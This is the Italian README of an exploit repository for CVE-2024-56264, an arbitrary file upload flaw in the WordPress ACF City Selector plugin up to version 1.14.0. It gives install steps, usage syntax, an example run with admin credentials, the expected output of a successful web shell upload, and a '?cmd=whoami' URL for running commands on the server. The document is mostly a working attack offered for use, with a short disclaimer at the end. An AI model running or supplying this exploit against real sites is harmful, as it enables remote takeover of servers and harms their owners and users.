
Plugin WordPress ACF City Selector <= 1.14.0 - Vulnerabilità di caricamento arbitrario di file
Questa repository contiene un exploit per CVE-2024-56264, una vulnerabilità di Caricamento Arbitrario di File presente nel plugin WordPress ACF City Selector (versioni <= 1.14.0). Questa vulnerabilità consente a un attaccante di caricare un file PHP dannoso (web shell) su un'istanza WordPress vulnerabile ed eseguire comandi arbitrari sul server.
<= 1.14.0Il plugin ACF City Selector non riesce a validare correttamente i file caricati, consentendo agli attaccanti di bypassare le restrizioni e caricare file PHP arbitrari. Una volta caricato un file PHP dannoso, un attaccante può eseguire comandi di sistema remotamente, portando al compromissione totale del server.
Assicurarsi che quanto segue sia installato prima di eseguire lo script:
requests (installabile con: pip install requests)È possibile installare tutte le dipendenze richieste utilizzando:
pip install -r requirements.txt
Esecuzione dell'exploit:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
Plugin WordPress ACF City Selector <= 1.14.0 - Vulnerabilità di caricamento arbitrario di file
opzioni:
-h, --help mostra questo messaggio di aiuto ed esci
--url URL URL di base del sito web (es., http://192.168.100.74/wordpress)
--username USERNAME Nome utente WordPress
--password PASSWORD Password WordPress
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
In caso di sfruttamento riuscito, dovresti vedere:
[+] Versione del plugin rilevata: 1.14.0
[+] Versione vulnerabile rilevata! Procedo con lo sfruttamento.
[+] Accesso effettuato con successo.
[+] Nonce estratto: abc1234
[+] Shell caricata con successo: http://wordpress/wp-content/uploads/acfcs/q.php
In caso di successo, accedi alla shell caricata tramite:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Questo consente l'esecuzione remota di comandi sul server.
Questo script è destinato esclusivamente a scopi didattici e di test di sicurezza autorizzati. L'uso non autorizzato è illegale e può comportare gravi conseguenze. L'autore non è responsabile per qualsiasi uso improprio di questo exploit.